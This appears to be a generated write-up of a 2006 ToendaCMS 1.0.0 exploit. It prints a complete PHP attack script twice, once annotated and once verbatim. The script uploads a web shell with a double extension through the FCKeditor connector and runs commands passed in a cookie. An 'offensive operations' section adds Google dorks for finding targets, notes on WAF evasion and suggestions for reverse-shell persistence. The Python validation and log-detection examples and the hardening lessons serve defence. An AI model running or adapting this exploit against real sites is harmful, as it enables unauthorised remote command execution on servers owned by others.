Exploiting ToendaCMS 1.0.0: Arbitrary File Upload via FCKeditor

## What this paper is
This paper details a vulnerability in ToendaCMS version 1.0.0. Specifically, it describes how an attacker can exploit a flaw in the FCKeditor component to upload arbitrary PHP files to the web server. Once a malicious PHP file is uploaded, the attacker can then execute arbitrary commands on the server by leveraging a cookie-based command execution mechanism.
## Simple technical breakdown
The core of the vulnerability lies in how the FCKeditor file-upload connector bundled with ToendaCMS validates file types: it checks only the final extension of the uploaded filename against a whitelist, so a name such as `suntzu.php.jpg` passes the check while the web server still treats the file as PHP. The exploit crafts a multipart POST request to the connector script that looks like a legitimate file upload; the uploaded file is a PHP script that reads a command from a cookie. After the upload, the attacker sends a GET request for the uploaded file with the desired command in a `cmd` cookie, and the script executes the command and returns its output.
## Complete code and payload walkthrough
The provided PHP script is a command-line tool designed to automate the exploitation process.
```php
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ToendaCMS <= 1.0.0 Shizouka stable 'F(u)CKeditor' remote commands execution\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork: \"toendaCMS is Free Software released under the GNU/GPL License.\" | \"powered by toendaCMS\" -inurl:demo\n\n";
//works regardless of any php.ini settings,

// --- Argument parsing and usage ---
if ($argc<4) {
    echo "Usage: php ".$argv[0]." host path cmd OPTIONS\n";
    echo "host: target server (ip/hostname)\n";
    echo "path: path to toendacms\n";
    echo "cmd: a shell command\n";
    echo "Options:\n";
    echo " -p[port]: specify a port other than 80\n";
    echo " -P[ip:port]: specify a proxy\n";
    echo "Example:\n";
    echo "php ".$argv[0]." localhost /cms/ ls -la\n";
    die;
}
error_reporting(0);                   // suppress all error reporting
ini_set("max_execution_time",0);      // no execution time limit (attacker-side interpreter only)
ini_set("default_socket_timeout",5);  // 5-second timeout on socket operations

// --- Utility function: quick_dump ---
// Debug helper that renders a string as a hex dump followed by its printable
// ASCII form. It is never called by the exploit logic below.
function quick_dump($string)
{
    $result='';$exa='';$cont=0;
    for ($i=0; $i<=strlen($string)-1; $i++)
    {
        // Non-printable characters are shown as a dot. Note the bitwise "|"
        // rather than "||"; on two boolean operands it still behaves as OR.
        if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
            {$result.=" .";}
        else
            {$result.=" ".$string[$i];}
        if (strlen(dechex(ord($string[$i])))==2) // already two hex digits
            {$exa.=" ".dechex(ord($string[$i]));}
        else
            {$exa.=" 0".dechex(ord($string[$i]));} // pad a single digit with a leading zero
        $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} // line break every 15 bytes
    }
    return $exa."\r\n".$result; // hex dump, then the ASCII representation
}

// --- Network function: sendpacketii ---
// Sends a raw HTTP request to the target, directly or through an HTTP proxy,
// and leaves the response in the global $html.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; // expected ip:port proxy format
function sendpacketii($packet)
{
    global $proxy, $host, $port, $html, $proxy_regex;
    if ($proxy=='') { // direct connection
        $ock=fsockopen(gethostbyname($host),$port);
        if (!$ock) {
            echo 'No response from '.$host.':'.$port; die;
        }
    }
    else { // via proxy
        $c = preg_match($proxy_regex,$proxy); // validate proxy format
        if (!$c) {
            echo 'Not a valid proxy...';die;
        }
        $parts=explode(':',$proxy); // split proxy host and port
        echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
        $ock=fsockopen($parts[0],$parts[1]);
        if (!$ock) {
            echo 'No response from proxy...';die;
        }
    }
    fputs($ock,$packet); // send the crafted request
    if ($proxy=='') {
        $html='';
        while (!feof($ock)) { // read until the server closes the connection
            $html.=fgets($ock);
        }
    }
    else {
        $html='';
        // Read byte by byte until EOF is reached and the end of the HTTP headers (CRLFCRLF) has been seen
        while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
            $html.=fread($ock,1);
        }
    }
    fclose($ock);
    #debug
    #echo "\r\n".$html; // uncomment to print the raw HTTP response
}

// --- Main script logic ---
$host=$argv[1]; // target host
$path=$argv[2]; // path to ToendaCMS
$port=80;       // default port
$proxy="";      // default: no proxy
$cmd="";        // shell command to run on the target

// Remaining arguments: -p<port> and -P<ip:port> are options, everything else is the command
for ($i=3; $i<=$argc-1; $i++){
    $temp=$argv[$i][0].$argv[$i][1]; // first two characters of the argument
    if (($temp<>"-p") and ($temp<>"-P"))
        {$cmd.=" ".$argv[$i];} // append to the command string
    if ($temp=="-p")
    {
        $port=str_replace("-p","",$argv[$i]); // port number
    }
    if ($temp=="-P")
    {
        $proxy=str_replace("-P","",$argv[$i]); // proxy address
    }
}

// The path must start and end with '/'
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
// With a proxy the request line needs an absolute URL; otherwise just the path
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

// --- Payload construction ---
// The PHP file that will be uploaded: it prints "Hi Master!", undoes magic_quotes
// escaping on the 'cmd' cookie, prints a delimiter and runs the cookie value with passthru().
$shell="<?php echo chr(72).\"i Master!\";if(get_magic_quotes_gpc()){\$_COOKIE[\"cmd\"]=stripslashes(\$_COOKIE[\"cmd\"]);}";
$shell.="ini_set(\"max_execution_time\",0);error_reporting(0);";
$shell.="echo \"*delim*\";passthru(\$_COOKIE[\"cmd\"]);?>";

// --- Allowed extensions ---
// Extensions the connector's whitelist accepts. The exploit places ".php" before
// one of them (suntzu.php.jpg) so that a check on the last extension alone passes.
$allowed_extensions = array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla");

// --- Exploit loop: try each extension until one yields command output ---
for ($i=0; $i<=count($allowed_extensions)-1; $i++){
    $filename="suntzu.php.".$allowed_extensions[$i]; // e.g. suntzu.php.jpg
    $data="-----------------------------7d529a1d23092a\r\n"; // multipart boundary
    $data.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n"; // form field name and filename
    $data.="Content-Type:\r\n\r\n"; // empty content type
    $data.="$shell\r\n"; // the PHP payload
    $data.="-----------------------------7d529a1d23092a--\r\n"; // closing boundary

    // Upload request to the FCKeditor file-upload connector
    $packet="POST ".$p."engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
    $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Content-Length: ".strlen($data)."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    $packet.=$data;
    sendpacketii($packet);

    // Request the uploaded file; the command travels in the 'cmd' cookie
    $packet="GET ".$p."data/images/File/".$filename." HTTP/1.0\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Cookie: cmd=".$cmd."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    sendpacketii($packet);

    // "Hi Master!" in the response means the file ran as PHP; print what followed the delimiter
    if (eregi("Hi Master!",$html)){
        $temp=explode("*delim*",$html);
        die($temp[1]);
    }
}
// If the loop finishes without success
echo "Exploit failed...";
?>
```
# milw0rm.com [2006-07-18]
**Code Fragment/Block -> Practical Purpose**
* `#!/usr/bin/php -q -d short_open_tag=on` -> Specifies the interpreter and enables short open tags.
* `echo "ToendaCMS <= 1.0.0 ..."` -> Prints banner and information about the exploit.
* `if ($argc<4) { ... die; }` -> Checks for the minimum number of command-line arguments and prints usage instructions if insufficient.
* `error_reporting(0);` -> Disables error reporting to keep the output clean.
* `ini_set("max_execution_time",0);` -> Sets the script's execution time limit to unlimited.
* `ini_set("default_socket_timeout",5);` -> Sets a timeout for socket operations.
* `function quick_dump($string)` -> A helper function for displaying raw data in hex/ASCII format (likely for debugging).
* `$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';` -> Regular expression to validate proxy IP:Port format.
* `function sendpacketii($packet)` -> Core function for sending HTTP requests, handling direct connections and proxy connections.
* `global $proxy, $host, $port, $html, $proxy_regex;` -> Declares variables used from the global scope within the function.
* `$ock=fsockopen(...)` -> Establishes a socket connection to the target or proxy.
* `fputs($ock,$packet);` -> Sends the crafted HTTP packet over the socket.
* `while (!feof($ock)) { $html.=fgets($ock); }` (direct) / `while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); }` (proxy) -> Reads the HTTP response from the socket.
* `fclose($ock);` -> Closes the socket connection.
* `$host=$argv[1]; $path=$argv[2];` -> Assigns target host and path from command-line arguments.
* `for ($i=3; $i<=$argc-1; $i++){ ... }` -> Parses command-line arguments for port (`-p`) and proxy (`-P`) options, and builds the command string (`$cmd`).
* `if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) { ... die; }` -> Validates that the provided path starts and ends with a forward slash.
* `if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}` -> Constructs the base URL for requests based on whether a proxy is used.
* `$shell="<?php echo chr(72).\"i Master!\";if(get_magic_quotes_gpc()){\$_COOKIE[\"cmd\"]=stripslashes(\$_COOKIE[\"cmd\"]);}ini_set(\"max_execution_time\",0);error_reporting(0);echo \"*delim*\";passthru(\$_COOKIE[\"cmd\"]);?>";` -> This is the PHP payload. It prints "Hi Master!", handles magic quotes by stripping slashes from the `cmd` cookie, disables execution time and error reporting, prints a delimiter `*delim*`, and then executes the command received in the `cmd` cookie using `passthru()`.
* `$allowed_extensions = array(...)` -> The extensions the connector's whitelist accepts; the exploit tries each in turn. The weakness is that the check inspects only the final extension, so `suntzu.php.<ext>` is accepted even though the name also carries a `.php` segment.
* `for ($i=0; $i<=count($allowed_extensions)-1; $i++){ ... }` -> The main loop that iterates through each allowed extension.
* `$filename="suntzu.php.".$allowed_extensions[$i];` -> Constructs the filename for the uploaded shell, e.g., `suntzu.php.jpg`.
* `$data="..."` -> Prepares the multipart/form-data body for the HTTP POST request. This includes the boundary, the `Content-Disposition` header specifying the form field name (`NewFile`) and the crafted filename, and the actual shellcode.
* `$packet="POST ".$p."engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";` -> Crafts the HTTP POST request to the FCKeditor file upload endpoint. The parameters `Command=FileUpload`, `Type=File`, and `CurrentFolder=%2f` are crucial for triggering the upload functionality.
* `$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";` -> Sets the `Content-Type` header to `multipart/form-data` and specifies the boundary string.
* `$packet.="Host: ".$host."\r\n";` -> Sets the `Host` header.
* `$packet.="Content-Length: ".strlen($data)."\r\n";` -> Sets the `Content-Length` header to the size of the data being sent.
* `$packet.="Connection: Close\r\n\r\n";` -> Sets the `Connection` header to `Close` and adds the final CRLF to separate headers from the body.
* `$packet.=$data;` -> Appends the multipart form data to the packet.
* `sendpacketii($packet);` -> Sends the crafted upload packet to the target.
* `$packet="GET ".$p."data/images/File/".$filename." HTTP/1.0\r\n";` -> Crafts the HTTP GET request to access the uploaded shell. The path `data/images/File/` is the default upload directory for FCKeditor in this context.
* `$packet.="Host: ".$host."\r\n";` -> Sets the `Host` header.
* `$packet.="Cookie: cmd=".$cmd."\r\n";` -> **Crucially**, this line injects the shell command into the `cmd` cookie. The PHP shellcode will read this cookie and execute the command.
* `$packet.="Connection: Close\r\n\r\n";` -> Sets the `Connection` header and final CRLF.
* `sendpacketii($packet);` -> Sends the command execution packet.
* `if (eregi("Hi Master!",$html)){ ... die($temp[1]);}` -> Checks the response for the "Hi Master!" string. If found, it splits the response by `*delim*` and outputs the command's output.
* `echo "Exploit failed...";` -> Printed if the loop completes without a successful execution.
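The walkthrough above turns on one check: a whitelist that looks only at the text after the last dot. The following is an added example, not ToendaCMS or FCKeditor code, that models that flawed check beside a hardened one and a server-side naming policy. The extension list is the exploit script's `$allowed_extensions`; `EXECUTABLE_SEGMENTS`, the function names and the sample filenames are constructed for illustration.

```python
"""
Upload-filename validation: the "last extension only" pattern the exploit
relies on, next to a check that allows exactly one extension, rejects
executable segments anywhere in the name, and discards the client's stem.
"""
import os
import re
import secrets
from typing import Optional, Tuple

# The whitelist from the exploit script's $allowed_extensions.
ALLOWED_EXTENSIONS = {"zip", "doc", "xls", "pdf", "rtf", "csv", "jpg", "gif",
                      "jpeg", "png", "avi", "mpg", "mpeg", "swf", "fla"}

# Segments a web server may route to a script handler wherever they appear in
# the name (Apache mod_mime, for instance, treats every dotted segment as an
# extension). Illustrative list, not exhaustive.
EXECUTABLE_SEGMENTS = {"php", "php3", "php4", "php5", "phtml", "phar",
                       "cgi", "pl", "asp", "aspx", "jsp"}


def weak_last_extension_check(filename: str) -> bool:
    """The flawed pattern: whitelist only the text after the last dot.

    'suntzu.php.jpg' ends in 'jpg', so it passes even though a '.php'
    segment is present.
    """
    if "." not in filename:
        return False
    return filename.rsplit(".", 1)[1].lower() in ALLOWED_EXTENSIONS


def hardened_check(filename: str) -> bool:
    """Accept only <stem>.<ext> with a safe stem and one whitelisted extension."""
    if os.path.basename(filename.replace("\\", "/")) != filename:
        return False            # contains a path separator (traversal attempt)
    if filename.count(".") != 1 or filename.startswith("."):
        return False            # multiple extensions (shell.php.jpg) or dotfiles (.htaccess)
    stem, ext = filename.split(".")
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem):
        return False            # control characters, NUL bytes, spaces, unicode tricks
    ext = ext.lower()
    return ext in ALLOWED_EXTENSIONS and ext not in EXECUTABLE_SEGMENTS


def stored_name(filename: str) -> Optional[str]:
    """Server-chosen name: random stem plus the validated, lower-cased extension.

    Returns None when the upload must be rejected. Discarding the client's
    stem removes the attacker's control over what lands on disk.
    """
    if not hardened_check(filename):
        return None
    return secrets.token_hex(8) + "." + filename.split(".")[1].lower()


def compare(filename: str) -> Tuple[bool, bool]:
    """(weak verdict, hardened verdict) for one client-supplied filename."""
    return weak_last_extension_check(filename), hardened_check(filename)


if __name__ == "__main__":
    # Constructed sample names: the exploit's, a few variants, and benign ones.
    for name in ("suntzu.php.jpg", "shell.php", "shell.phtml", "shell.php\x00.jpg",
                 ".htaccess", "../upload.png", "report.pdf", "photo.JPG"):
        weak, hard = compare(name)
        print(f"{name!r:22} weak={weak!s:5} hardened={hard}")
```

Rejecting the name is only half of the fix the defensive section asks for: the upload directory should also be served without a script handler, so that even a file that slips through is returned as static content rather than executed.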
## Practical details for offensive operations teams
* **Required Access Level:** Network access to the target web server (HTTP/HTTPS ports). No prior authentication is required if the FCKeditor component is accessible.
* **Lab Preconditions:**
* A ToendaCMS 1.0.0 instance running on a test server.
* The FCKeditor component must be configured and accessible via its standard path (e.g., `engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php`).
* The web server must be configured to allow PHP execution and file uploads to the `data/images/File/` directory (or a similar default location).
* The PHP `allow_url_fopen` setting on the attacker's machine is irrelevant because the script uses raw sockets (`fsockopen`); `short_open_tag` must be enabled for the script's `<?` opening tag, which the shebang line forces with `-d short_open_tag=on`.
* **Tooling Assumptions:**
* PHP interpreter installed on the attacker's machine.
* Basic network connectivity.
* **Execution Pitfalls:**
* **Path Misconfiguration:** The `$path` argument must accurately reflect the root directory of the ToendaCMS installation. Incorrect paths will lead to failed requests.
* **FCKeditor Path Variations:** The exploit assumes a specific path for the FCKeditor connector (`engine/js/FCKeditor/...`). If the CMS uses a different path, the exploit will fail.
* **Upload Directory Permissions:** If the web server cannot write to the `data/images/File/` directory, the shell upload will fail.
* **Firewalls/WAFs:** Network firewalls or Web Application Firewalls (WAFs) might detect and block the unusual `multipart/form-data` POST requests or the subsequent GET requests with the `cmd` cookie.
* **PHP Configuration:** The `ini_set` calls in the script affect only the attacker-side interpreter, and those in the payload only run once the uploaded file is already executing; restrictive target settings (very small upload limits, `passthru` or `exec` listed in `disable_functions`) can still prevent execution.
* **Magic Quotes:** The shellcode checks `get_magic_quotes_gpc()`. If magic quotes are enabled, PHP escapes quotes and backslashes in the cookie value and the shellcode reverses that with `stripslashes()` before running the command; if disabled, the cookie value is executed as received.
* **Extension Blacklisting:** If the server has a more robust file upload validation that blocks the specific extensions used in `$allowed_extensions`, the exploit might fail. The attacker could try other common extensions if they know them.
* **Tradecraft Considerations:**
* **Reconnaissance:** Thoroughly identify the ToendaCMS version and the presence/path of the FCKeditor component. Use dorks as suggested in the script.
* **Stealth:** The exploit is noisy. The POST and GET requests are distinct. WAF evasion techniques might be necessary for more stealthy operations.
* **Payload Customization:** The `suntzu.php` filename is a placeholder. A more sophisticated payload might be used, and the filename could be randomized.
* **Command Execution:** The `cmd` cookie is a simple mechanism. For persistent access, a more advanced reverse shell or beacon would be uploaded.
* **Telemetry:** Web server access logs showing a POST to the FCKeditor connector followed by a GET for a file in the upload directory whose name contains `.php.` before another extension; file-system auditing showing a new file created under `data/images/File/`; process-creation telemetry showing the web server worker spawning a shell (`passthru()` runs the command through `/bin/sh`).
## Where this was used and when
* **Context:** This exploit targets ToendaCMS, a web content management system. The vulnerability lies within the FCKeditor component, a popular rich text editor that was integrated into many web applications.
* **Timeframe:** Published in **July 2006**. This indicates that the vulnerability was present and exploitable around that period. Exploits from this era often targeted older, less patched web applications.
## Defensive lessons for modern teams
* **Input Validation:** Always validate file uploads rigorously. This includes checking file extensions, MIME types, and file content. Do not rely solely on client-side validation or simple extension checks.
* **Secure Component Integration:** When integrating third-party components like FCKeditor, ensure they are up-to-date and properly configured. Vulnerabilities in components can lead to compromise of the entire application.
* **Principle of Least Privilege:** Configure web server directories with appropriate permissions. The upload directory should not have execute permissions, and write permissions should be restricted.
* **Web Application Firewalls (WAFs):** Deploy and maintain WAFs to detect and block malicious HTTP requests, including those attempting arbitrary file uploads and command injection.
* **Regular Patching and Updates:** Keep all web applications, CMS platforms, and their components (like editors) updated to the latest secure versions.
* **Monitoring and Logging:** Implement robust logging for web server access, file system changes, and process execution. Monitor these logs for suspicious activity.
* **Disable Unnecessary Features:** If the application does not need `passthru`, `exec`, `system` or similar functions, list them in PHP's `disable_functions` so that an uploaded script cannot call them.
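To make the telemetry bullet in the offensive-operations section and the monitoring lesson above concrete, here is an added detector (example code, not part of the original page or of the exploit) that runs over Apache combined-format access-log lines. The `SAMPLE_LOG` is constructed: the IPs, timestamps and byte counts are invented, and the request paths mirror the two requests the exploit sends plus benign traffic. It flags a POST to the FCKeditor connector with `Command=FileUpload`, a GET for an upload whose name carries a script extension before a final extension, and the two from the same client within a time window.

```python
"""
Detector for the upload-then-execute pattern over web server access logs.
Parses combined-format lines, applies two per-request rules and one
correlation rule keyed on the client address.
"""
import re
from datetime import datetime
from typing import Dict, Iterable, List, Optional

# Constructed sample log: two requests mirroring the exploit, then benign traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [18/Jul/2006:10:21:05 +0000] "POST /cms/engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0" 200 312 "-" "-"
198.51.100.7 - - [18/Jul/2006:10:21:06 +0000] "GET /cms/data/images/File/suntzu.php.jpg HTTP/1.0" 200 88 "-" "-"
203.0.113.9 - - [18/Jul/2006:10:25:00 +0000] "GET /cms/index.php HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Jul/2006:10:25:02 +0000] "GET /cms/data/images/File/brochure.pdf HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Combined-format prefix: client, identd, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# FCKeditor file-manager connector path segment (any connector language)
CONNECTOR_RE = re.compile(r"/filemanager/browser/default/connectors/", re.I)
# A script extension followed by one more extension, e.g. suntzu.php.jpg
DOUBLE_EXT_RE = re.compile(r"\.(?:php\d?|phtml|phar)\.[a-z0-9]{1,5}$", re.I)


def parse_line(line: str) -> Optional[Dict]:
    """Return the fields the rules need, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    return {
        "ip": m["ip"],
        "time": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": path,
        "query": query,
        "status": int(m["status"]),
    }


def rules_for(ev: Dict) -> List[str]:
    """Per-request rules; returns the names of every rule the event matches."""
    hits = []
    if (ev["method"] == "POST" and CONNECTOR_RE.search(ev["path"])
            and "Command=FileUpload" in ev["query"]):
        hits.append("fckeditor_upload_connector")
    if ev["method"] == "GET" and DOUBLE_EXT_RE.search(ev["path"]):
        hits.append("double_extension_fetch")
    return hits


def detect(lines: Iterable[str], window_seconds: int = 300) -> List[Dict]:
    """Run the rules in log order and correlate upload -> fetch per client."""
    alerts: List[Dict] = []
    last_upload: Dict[str, datetime] = {}  # client ip -> time of last connector upload
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        for rule in rules_for(ev):
            alerts.append({"rule": rule, "ip": ev["ip"], "path": ev["path"]})
            if rule == "fckeditor_upload_connector":
                last_upload[ev["ip"]] = ev["time"]
            elif rule == "double_extension_fetch" and ev["ip"] in last_upload:
                if (ev["time"] - last_upload[ev["ip"]]).total_seconds() <= window_seconds:
                    alerts.append({"rule": "upload_then_fetch_same_client",
                                   "ip": ev["ip"], "path": ev["path"]})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG.splitlines()):
        print(f'{a["rule"]:32} {a["ip"]:15} {a["path"]}')
```

Apache's default log formats do not record the `Cookie` header, so the detector keys on the request path; adding `%{Cookie}i` to the `LogFormat` would let a further rule match the `cmd=` cookie the page describes. The correlation rule is the one worth paging on: either request alone can occur in benign traffic, but an upload to the connector followed by a fetch of a double-extension file from the same client is the exploit's signature.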
## ASCII visual
```ascii
+-----------------+        +---------------------------+        +----------------------+
| Attacker's      |        | ToendaCMS Server          |        | Web Server File      |
| Machine (PHP)   |        | (FCKeditor connector.php) |        | System               |
+-----------------+        +---------------------------+        +----------------------+
        |                              |                                   |
        | 1. POST multipart upload     |                                   |
        |    (suntzu.php.jpg)          |                                   |
        |----------------------------->|  writes data/images/File/         |
        |                              |---------------------------------->|
        |                              |                                   |
        | 2. GET data/images/File/     |                                   |
        |    suntzu.php.jpg            |                                   |
        |    Cookie: cmd=ls -la        |                                   |
        |----------------------------->|  PHP handler runs the file,       |
        |                              |  passthru() executes cmd          |
        |<-----------------------------|                                   |
        |  "Hi Master!*delim*<output>" |                                   |
```
---
## Original Exploit-DB Content (Verbatim)
```text
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ToendaCMS <= 1.0.0 Shizouka stable 'F(u)CKeditor' remote commands execution\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork: \"toendaCMS is Free Software released under the GNU/GPL License.\" | \"powered by toendaCMS\" -inurl:demo\n\n";
//works regardless of any php.ini settings,
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo "path: path to toendacms\n";
echo "cmd: a shell command\n";
echo "Options:\n";
echo " -p[port]: specify a port other than 80\n";
echo " -P[ip:port]: specify a proxy\n";
echo "Example:\n";
echo "php ".$argv[0]." localhost /cms/ ls -la\n";
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
$cmd="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$shell="<?php echo chr(72).\"i Master!\";if(get_magic_quotes_gpc()){\$_COOKIE[\"cmd\"]=stripslashes(\$_COOKIE[\"cmd\"]);}";
$shell.="ini_set(\"max_execution_time\",0);error_reporting(0);";
$shell.="echo \"*delim*\";passthru(\$_COOKIE[\"cmd\"]);?>";
$allowed_extensions = array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla");
for ($i=0; $i<=count($allowed_extensions)-1; $i++){
$filename="suntzu.php.".$allowed_extensions[$i];
$data="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n";
$data.="Content-Type:\r\n\r\n";
$data.="$shell\r\n";
$data.="-----------------------------7d529a1d23092a--\r\n";
$packet="POST ".$p."engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
//echo $html;
$packet="GET ".$p."data/images/File/".$filename." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
if (eregi("Hi Master!",$html)){
$temp=explode("*delim*",$html);
die($temp[1]);}
}
//if you are here...
echo "Exploit failed...";
?>
# milw0rm.com [2006-07-18]